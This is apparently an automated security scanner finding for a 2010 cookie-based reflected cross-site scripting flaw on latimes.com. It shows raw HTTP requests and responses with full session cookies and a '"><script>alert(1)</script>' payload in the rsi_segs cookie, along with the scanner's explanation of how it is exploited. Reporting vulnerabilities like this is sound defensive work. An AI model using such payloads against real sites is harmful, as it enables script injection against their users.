ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=92002"><script>alert(1)</script>f4c9bfd241d; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z1n1
Expires: Sun, 12 Dec 2010 18:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42950"><script>alert(1)</script>48ec33cdaa was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /services/site/self-service HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=42950"><script>alert(1)</script>48ec33cdaa; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z1n1
Expires: Sun, 12 Dec 2010 18:55:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138183

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c769"><script>alert(1)</script>cb747b70efd was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z1n1
Expires: Sun, 12 Dec 2010 18:54:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:54:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 138201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">